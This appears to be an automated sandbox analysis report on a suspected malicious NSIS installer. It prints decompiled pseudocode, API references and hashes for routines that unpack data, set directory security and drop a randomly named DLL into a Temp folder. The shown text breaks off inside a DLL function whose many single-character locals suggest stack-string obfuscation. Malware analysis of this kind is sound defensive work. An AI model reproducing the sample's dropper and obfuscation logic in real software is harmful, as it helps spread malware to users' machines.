                                                                                    • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                    • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                    • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                                    				signed int _v8;
                                                                                    				long _v12;
                                                                                    				void* _v16;
                                                                                    				long _v20;
                                                                                    				long _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				char _v92;
                                                                                    				void* _t67;
                                                                                    				void* _t68;
                                                                                    				long _t74;
                                                                                    				intOrPtr _t79;
                                                                                    				long _t80;
                                                                                    				void* _t82;
                                                                                    				int _t84;
                                                                                    				void* _t97;
                                                                                    				void* _t100;
                                                                                    				long _t101;
                                                                                    				signed int _t102;
                                                                                    				long _t103;
                                                                                    				int _t104;
                                                                                    				intOrPtr _t105;
                                                                                    				long _t106;
                                                                                    				void* _t107;
                                                                                    
                                                                                    				_t102 = _a16;
                                                                                    				_t97 = _a12;
                                                                                    				_v12 = _t102;
                                                                                    				if(_t97 == 0) {
                                                                                    					_v12 = 0x8000;
                                                                                    				}
                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                    				_v16 = _t97;
                                                                                    				if(_t97 == 0) {
                                                                                    					_v16 = 0x418c48;
                                                                                    				}
                                                                                    				_t65 = _a4;
                                                                                    				if(_a4 >= 0) {
                                                                                    					E004030E2( *0x42ec78 + _t65);
                                                                                    				}
                                                                                    				_t67 = E004030B0( &_a16, 4); // executed
                                                                                    				if(_t67 == 0) {
                                                                                    					L34:
                                                                                    					_push(0xfffffffd);
                                                                                    					goto L35;
                                                                                    				} else {
                                                                                    					if((_a19 & 0x00000080) == 0) {
                                                                                    						if(_t97 == 0) {
                                                                                    							while(_a16 > 0) {
                                                                                    								_t103 = _v12;
                                                                                    								if(_a16 < _t103) {
                                                                                    									_t103 = _a16;
                                                                                    								}
                                                                                    								if(E004030B0(0x414c48, _t103) == 0) {
                                                                                    									goto L34;
                                                                                    								} else {
                                                                                    									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                                                                    										L29:
                                                                                    										_push(0xfffffffe);
                                                                                    										L35:
                                                                                    										_pop(_t68);
                                                                                    										return _t68;
                                                                                    									} else {
                                                                                    										_v8 = _v8 + _t103;
                                                                                    										_a16 = _a16 - _t103;
                                                                                    										continue;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							L45:
                                                                                    							return _v8;
                                                                                    						}
                                                                                    						if(_a16 < _t102) {
                                                                                    							_t102 = _a16;
                                                                                    						}
                                                                                    						if(E004030B0(_t97, _t102) != 0) {
                                                                                    							_v8 = _t102;
                                                                                    							goto L45;
                                                                                    						} else {
                                                                                    							goto L34;
                                                                                    						}
                                                                                    					}
                                                                                    					_t74 = GetTickCount();
                                                                                    					 *0x40b5ac =  *0x40b5ac & 0x00000000;
                                                                                    					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
                                                                                    					_t14 =  &_a16;
                                                                                    					 *_t14 = _a16 & 0x7fffffff;
                                                                                    					_v20 = _t74;
                                                                                    					 *0x40b090 = 8;
                                                                                    					 *0x414c38 = 0x40cc30;
                                                                                    					 *0x414c34 = 0x40cc30;
                                                                                    					 *0x414c30 = 0x414c30;
                                                                                    					_a4 = _a16;
                                                                                    					if( *_t14 <= 0) {
                                                                                    						goto L45;
                                                                                    					} else {
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					while(1) {
                                                                                    						L9:
                                                                                    						_t104 = 0x4000;
                                                                                    						if(_a16 < 0x4000) {
                                                                                    							_t104 = _a16;
                                                                                    						}
                                                                                    						if(E004030B0(0x414c48, _t104) == 0) {
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_a16 = _a16 - _t104;
                                                                                    						 *0x40b080 = 0x414c48;
                                                                                    						 *0x40b084 = _t104;
                                                                                    						while(1) {
                                                                                    							_t100 = _v16;
                                                                                    							 *0x40b088 = _t100;
                                                                                    							 *0x40b08c = _v12;
                                                                                    							_t79 = E00406034(0x40b080);
                                                                                    							_v28 = _t79;
                                                                                    							if(_t79 < 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t105 =  *0x40b088; // 0x41af03
                                                                                    							_t106 = _t105 - _t100;
                                                                                    							_t80 = GetTickCount();
                                                                                    							_t101 = _t80;
                                                                                    							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                    								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                    								_t107 = _t107 + 0xc;
                                                                                    								E00404EB3(0,  &_v92);
                                                                                    								_v20 = _t101;
                                                                                    							}
                                                                                    							if(_t106 == 0) {
                                                                                    								if(_a16 > 0) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    								goto L45;
                                                                                    							} else {
                                                                                    								if(_a12 != 0) {
                                                                                    									_t82 =  *0x40b088; // 0x41af03
                                                                                    									_v8 = _v8 + _t106;
                                                                                    									_v12 = _v12 - _t106;
                                                                                    									_v16 = _t82;
                                                                                    									L24:
                                                                                    									if(_v28 != 1) {
                                                                                    										continue;
                                                                                    									}
                                                                                    									goto L45;
                                                                                    								}
                                                                                    								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                                    								if(_t84 == 0 || _v24 != _t106) {
                                                                                    									goto L29;
                                                                                    								} else {
                                                                                    									_v8 = _v8 + _t106;
                                                                                    									goto L24;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_push(0xfffffffc);
                                                                                    						goto L35;
                                                                                    					}
                                                                                    					goto L34;
                                                                                    				}
                                                                                    			}


























                                                                                    0x00402e96
                                                                                    0x00402e9a
                                                                                    0x00402e9d
                                                                                    0x00402ea2
                                                                                    0x00402ea4
                                                                                    0x00402ea4
                                                                                    0x00402eab
                                                                                    0x00402eaf
                                                                                    0x00402eb4
                                                                                    0x00402eb6
                                                                                    0x00402eb6
                                                                                    0x00402ebd
                                                                                    0x00402ec2
                                                                                    0x00402ecd
                                                                                    0x00402ecd
                                                                                    0x00402ed8
                                                                                    0x00402edf
                                                                                    0x0040305b
                                                                                    0x0040305b
                                                                                    0x00000000
                                                                                    0x00402ee5
                                                                                    0x00402ee9
                                                                                    0x00403046
                                                                                    0x0040309b
                                                                                    0x00403060
                                                                                    0x00403066
                                                                                    0x00403068
                                                                                    0x00403068
                                                                                    0x00403079
                                                                                    0x00000000
                                                                                    0x0040307b
                                                                                    0x0040308e
                                                                                    0x00403040
                                                                                    0x00403040
                                                                                    0x0040305d
                                                                                    0x0040305d
                                                                                    0x00000000
                                                                                    0x00403095
                                                                                    0x00403095
                                                                                    0x00403098
                                                                                    0x00000000
                                                                                    0x00403098
                                                                                    0x0040308e
                                                                                    0x00403079
                                                                                    0x004030a6
                                                                                    0x00000000
                                                                                    0x004030a6
                                                                                    0x0040304b
                                                                                    0x0040304d
                                                                                    0x0040304d
                                                                                    0x00403059
                                                                                    0x004030a3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403059
                                                                                    0x00402ef5
                                                                                    0x00402ef7
                                                                                    0x00402efe
                                                                                    0x00402f05
                                                                                    0x00402f05
                                                                                    0x00402f0c
                                                                                    0x00402f14
                                                                                    0x00402f1e
                                                                                    0x00402f23
                                                                                    0x00402f2b
                                                                                    0x00402f35
                                                                                    0x00402f38
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f3e
                                                                                    0x00402f3e
                                                                                    0x00402f3e
                                                                                    0x00402f46
                                                                                    0x00402f48
                                                                                    0x00402f48
                                                                                    0x00402f59
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f5f
                                                                                    0x00402f62
                                                                                    0x00402f68
                                                                                    0x00402f6e
                                                                                    0x00402f6e
                                                                                    0x00402f79
                                                                                    0x00402f7f
                                                                                    0x00402f84
                                                                                    0x00402f8b
                                                                                    0x00402f8e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f94
                                                                                    0x00402f9a
                                                                                    0x00402f9c
                                                                                    0x00402fa5
                                                                                    0x00402fa7
                                                                                    0x00402fd5
                                                                                    0x00402fdb
                                                                                    0x00402fe4
                                                                                    0x00402fe9
                                                                                    0x00402fe9
                                                                                    0x00402ff0
                                                                                    0x00403034
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402ff2
                                                                                    0x00402ff5
                                                                                    0x00403017
                                                                                    0x0040301c
                                                                                    0x0040301f
                                                                                    0x00403022
                                                                                    0x00403025
                                                                                    0x00403029
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040302f
                                                                                    0x00403003
                                                                                    0x0040300b
                                                                                    0x00000000
                                                                                    0x00403012
                                                                                    0x00403012
                                                                                    0x00000000
                                                                                    0x00403012
                                                                                    0x0040300b
                                                                                    0x00402ff0
                                                                                    0x0040303c
                                                                                    0x00000000
                                                                                    0x0040303c
                                                                                    0x00000000
                                                                                    0x00402f3e

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                    • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                    • wsprintfA.USER32 ref: 00402FD5
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,0041AF03,7FFFFFFF,00000000), ref: 00403003
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountTick$FileWritewsprintf
                                                                                    • String ID: ... %d%%$HLA$HLA
                                                                                    • API String ID: 4209647438-295942573
                                                                                    • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                    • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                                                    • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                    • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E00401751(FILETIME* __ebx, void* __eflags) {
                                                                                    				void* _t33;
                                                                                    				void* _t41;
                                                                                    				void* _t43;
                                                                                    				FILETIME* _t49;
                                                                                    				FILETIME* _t62;
                                                                                    				void* _t64;
                                                                                    				signed int _t70;
                                                                                    				FILETIME* _t71;
                                                                                    				FILETIME* _t75;
                                                                                    				signed int _t77;
                                                                                    				void* _t80;
                                                                                    				CHAR* _t82;
                                                                                    				void* _t85;
                                                                                    
                                                                                    				_t75 = __ebx;
                                                                                    				_t82 = E00402A29(0x31);
                                                                                    				 *(_t85 - 0xc) = _t82;
                                                                                    				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                    				_t33 = E00405727(_t82);
                                                                                    				_push(_t82);
                                                                                    				if(_t33 == 0) {
                                                                                    					lstrcatA(E004056BA(E00405BC7(0x409c40, 0x434800)), ??);
                                                                                    				} else {
                                                                                    					_push(0x409c40);
                                                                                    					E00405BC7();
                                                                                    				}
                                                                                    				E00405E29(0x409c40);
                                                                                    				while(1) {
                                                                                    					__eflags =  *(_t85 + 8) - 3;
                                                                                    					if( *(_t85 + 8) >= 3) {
                                                                                    						_t64 = E00405EC2(0x409c40);
                                                                                    						_t77 = 0;
                                                                                    						__eflags = _t64 - _t75;
                                                                                    						if(_t64 != _t75) {
                                                                                    							_t71 = _t64 + 0x14;
                                                                                    							__eflags = _t71;
                                                                                    							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                    						__eflags = _t70;
                                                                                    						 *(_t85 + 8) = _t70;
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                    					if( *(_t85 + 8) == _t75) {
                                                                                    						E0040587F(0x409c40);
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - 1;
                                                                                    					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                    					__eflags = _t41 - 0xffffffff;
                                                                                    					 *(_t85 - 8) = _t41;
                                                                                    					if(_t41 != 0xffffffff) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                    					if( *(_t85 + 8) != _t75) {
                                                                                    						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
                                                                                    						__eflags =  *(_t85 + 8) - 2;
                                                                                    						if(__eflags == 0) {
                                                                                    							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                    						}
                                                                                    						L31:
                                                                                    						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
                                                                                    						__eflags =  *0x42eca8;
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						E00405BC7(0x40a440, 0x42f000);
                                                                                    						E00405BC7(0x42f000, 0x409c40);
                                                                                    						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\hardz\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                    						E00405BC7(0x42f000, 0x40a440);
                                                                                    						_t62 = E00405488("C:\Users\hardz\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                    						__eflags = _t62;
                                                                                    						if(_t62 == 0) {
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							__eflags = _t62 == 1;
                                                                                    							if(_t62 == 1) {
                                                                                    								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
                                                                                    								L32:
                                                                                    								_t49 = 0;
                                                                                    								__eflags = 0;
                                                                                    							} else {
                                                                                    								_push(0x409c40);
                                                                                    								_push(0xfffffffa);
                                                                                    								E00404EB3();
                                                                                    								L29:
                                                                                    								_t49 = 0x7fffffff;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					L33:
                                                                                    					return _t49;
                                                                                    				}
                                                                                    				E00404EB3(0xffffffea,  *(_t85 - 0xc));
                                                                                    				 *0x42ecd4 =  *0x42ecd4 + 1;
                                                                                    				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                                                                    				 *0x42ecd4 =  *0x42ecd4 - 1;
                                                                                    				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                    				_t80 = _t43;
                                                                                    				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                    					L22:
                                                                                    					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c);
                                                                                    				} else {
                                                                                    					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                    					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                    						goto L22;
                                                                                    					}
                                                                                    				}
                                                                                    				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                                                                    				__eflags = _t80 - _t75;
                                                                                    				if(_t80 >= _t75) {
                                                                                    					goto L31;
                                                                                    				} else {
                                                                                    					__eflags = _t80 - 0xfffffffe;
                                                                                    					if(_t80 != 0xfffffffe) {
                                                                                    						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
                                                                                    					} else {
                                                                                    						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
                                                                                    						lstrcatA(0x409c40,  *(_t85 - 0xc));
                                                                                    					}
                                                                                    					_push(0x200010);
                                                                                    					_push(0x409c40);
                                                                                    					E00405488();
                                                                                    					goto L29;
                                                                                    				}
                                                                                    				goto L33;
                                                                                    			}
















                                                                                    0x00401751
                                                                                    0x00401758
                                                                                    0x00401761
                                                                                    0x00401764
                                                                                    0x00401767
                                                                                    0x0040176c
                                                                                    0x00401774
                                                                                    0x00401790
                                                                                    0x00401776
                                                                                    0x00401776
                                                                                    0x00401777
                                                                                    0x00401777
                                                                                    0x00401796
                                                                                    0x004017a0
                                                                                    0x004017a0
                                                                                    0x004017a4
                                                                                    0x004017a7
                                                                                    0x004017ac
                                                                                    0x004017ae
                                                                                    0x004017b0
                                                                                    0x004017b5
                                                                                    0x004017b5
                                                                                    0x004017c0
                                                                                    0x004017c0
                                                                                    0x004017d1
                                                                                    0x004017d3
                                                                                    0x004017d3
                                                                                    0x004017d4
                                                                                    0x004017d4
                                                                                    0x004017d7
                                                                                    0x004017da
                                                                                    0x004017dd
                                                                                    0x004017dd
                                                                                    0x004017e4
                                                                                    0x004017f3
                                                                                    0x004017f8
                                                                                    0x004017fb
                                                                                    0x004017fe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401800
                                                                                    0x00401803
                                                                                    0x0040185d
                                                                                    0x00401862
                                                                                    0x004015a8
                                                                                    0x0040268f
                                                                                    0x0040268f
                                                                                    0x004028be
                                                                                    0x004028c1
                                                                                    0x004028c1
                                                                                    0x00000000
                                                                                    0x00401805
                                                                                    0x0040180b
                                                                                    0x00401816
                                                                                    0x00401823
                                                                                    0x0040182e
                                                                                    0x00401844
                                                                                    0x00401844
                                                                                    0x00401847
                                                                                    0x00000000
                                                                                    0x0040184d
                                                                                    0x0040184d
                                                                                    0x0040184e
                                                                                    0x0040186b
                                                                                    0x004028c7
                                                                                    0x004028c7
                                                                                    0x004028c7
                                                                                    0x00401850
                                                                                    0x00401850
                                                                                    0x00401851
                                                                                    0x00401492
                                                                                    0x00402241
                                                                                    0x00402241
                                                                                    0x00402241
                                                                                    0x0040184e
                                                                                    0x00401847
                                                                                    0x004028c9
                                                                                    0x004028cd
                                                                                    0x004028cd
                                                                                    0x0040187b
                                                                                    0x00401880
                                                                                    0x0040188e
                                                                                    0x00401893
                                                                                    0x00401899
                                                                                    0x0040189d
                                                                                    0x0040189f
                                                                                    0x004018a7
                                                                                    0x004018b3
                                                                                    0x004018a1
                                                                                    0x004018a1
                                                                                    0x004018a5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004018a5
                                                                                    0x004018bc
                                                                                    0x004018c2
                                                                                    0x004018c4
                                                                                    0x00000000
                                                                                    0x004018ca
                                                                                    0x004018ca
                                                                                    0x004018cd
                                                                                    0x004018e5
                                                                                    0x004018cf
                                                                                    0x004018d2
                                                                                    0x004018db
                                                                                    0x004018db
                                                                                    0x004018ea
                                                                                    0x004018ef
                                                                                    0x0040223c
                                                                                    0x00000000
                                                                                    0x0040223c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Fdskdfkdsfsdfdsf,00434800,00000000,00000000,00000031), ref: 00401790
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Fdskdfkdsfsdfdsf,Fdskdfkdsfsdfdsf,00000000,00000000,Fdskdfkdsfsdfdsf,00434800,00000000,00000000,00000031), ref: 004017BA
                                                                                      • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,0042E420,NSIS Error), ref: 00405BD4
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                      • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041AF03,74B5EA30), ref: 00404F0F
                                                                                      • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp$C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll$Fdskdfkdsfsdfdsf
                                                                                    • API String ID: 1941528284-1851557007
                                                                                    • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                    • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                    • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                    • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405375(CHAR* _a4) {
                                                                                    				struct _SECURITY_ATTRIBUTES _v16;
                                                                                    				struct _SECURITY_DESCRIPTOR _v36;
                                                                                    				int _t22;
                                                                                    				long _t23;
                                                                                    
                                                                                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                    				_v36.Owner = 0x40735c;
                                                                                    				_v36.Group = 0x40735c;
                                                                                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                    				_v16.lpSecurityDescriptor =  &_v36;
                                                                                    				_v36.Revision = 1;
                                                                                    				_v36.Control = 4;
                                                                                    				_v36.Dacl = 0x40734c;
                                                                                    				_v16.nLength = 0xc;
                                                                                    				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                    				if(_t22 != 0) {
                                                                                    					L1:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t23 = GetLastError();
                                                                                    				if(_t23 == 0xb7) {
                                                                                    					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                    						goto L1;
                                                                                    					}
                                                                                    					return GetLastError();
                                                                                    				}
                                                                                    				return _t23;
                                                                                    			}







                                                                                    0x00405380
                                                                                    0x00405384
                                                                                    0x00405387
                                                                                    0x0040538d
                                                                                    0x00405391
                                                                                    0x00405395
                                                                                    0x0040539d
                                                                                    0x004053a4
                                                                                    0x004053aa
                                                                                    0x004053b1
                                                                                    0x004053b8
                                                                                    0x004053c0
                                                                                    0x004053c2
                                                                                    0x00000000
                                                                                    0x004053c2
                                                                                    0x004053cc
                                                                                    0x004053d3
                                                                                    0x004053e9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004053eb
                                                                                    0x004053ef

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                    • GetLastError.KERNEL32 ref: 004053CC
                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                    • GetLastError.KERNEL32 ref: 004053EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                    • API String ID: 3449924974-1782582443
                                                                                    • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                    • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                    • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                    • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E737942C8(void* __eflags) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				signed int _v32;
                                                                                    				void* _v36;
                                                                                    				char _v40;
                                                                                    				char _v41;
                                                                                    				char _v42;
                                                                                    				char _v43;
                                                                                    				char _v44;
                                                                                    				char _v45;
                                                                                    				char _v46;
                                                                                    				char _v47;
                                                                                    				char _v48;
                                                                                    				char _v49;
                                                                                    				char _v50;
                                                                                    				char _v51;
                                                                                    				char _v52;
                                                                                    				char _v53;
                                                                                    				char _v54;
                                                                                    				char _v55;
                                                                                    				char _v56;
                                                                                    				char _v57;
                                                                                    				char _v58;
                                                                                    				char _v59;
                                                                                    				char _v60;
                                                                                    				char _v61;
                                                                                    				char _v62;
                                                                                    				char _v63;
                                                                                    				char _v64;
                                                                                    				char _v65;
                                                                                    				char _v66;
                                                                                    				char _v67;
                                                                                    				char _v68;
                                                                                    				char _v69;
                                                                                    				char _v70;
                                                                                    				char _v71;
                                                                                    				char _v72;
                                                                                    				signed int _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				intOrPtr _v84;
                                                                                    				intOrPtr _v88;
                                                                                    				short _v90;
                                                                                    				short _v92;
                                                                                    				short _v94;
                                                                                    				short _v96;
                                                                                    				short _v98;
                                                                                    				short _v100;
                                                                                    				short _v102;
                                                                                    				short _v104;
                                                                                    				short _v106;
                                                                                    				short _v108;
                                                                                    				short _v110;
                                                                                    				short _v112;
                                                                                    				short _v114;
                                                                                    				short _v116;
                                                                                    				short _v118;
                                                                                    				short _v120;
                                                                                    				short _v122;
                                                                                    				char _v124;
                                                                                    				intOrPtr _v128;
                                                                                    				intOrPtr _v132;
                                                                                    				intOrPtr _v136;
                                                                                    				long _v140;
                                                                                    				intOrPtr _v144;
                                                                                    				signed int _v148;
                                                                                    				intOrPtr _v152;
                                                                                    				intOrPtr _v156;
                                                                                    				intOrPtr _v160;
                                                                                    				intOrPtr _v164;
                                                                                    				intOrPtr _v168;
                                                                                    				intOrPtr _v172;
                                                                                    				intOrPtr _v176;
                                                                                    				intOrPtr _v180;
                                                                                    				intOrPtr _v184;
                                                                                    				char _v200;
                                                                                    				char _v268;
                                                                                    				char _v1308;
                                                                                    				short _t172;
                                                                                    				short _t173;
                                                                                    				short _t174;
                                                                                    				short _t175;
                                                                                    				short _t176;
                                                                                    				short _t177;
                                                                                    				short _t178;
                                                                                    				short _t179;
                                                                                    				short _t180;
                                                                                    				short _t181;
                                                                                    				short _t182;
                                                                                    				short _t183;
                                                                                    				short _t184;
                                                                                    				short _t185;
                                                                                    				short _t186;
                                                                                    				short _t187;
                                                                                    				short _t188;
                                                                                    				signed int _t202;
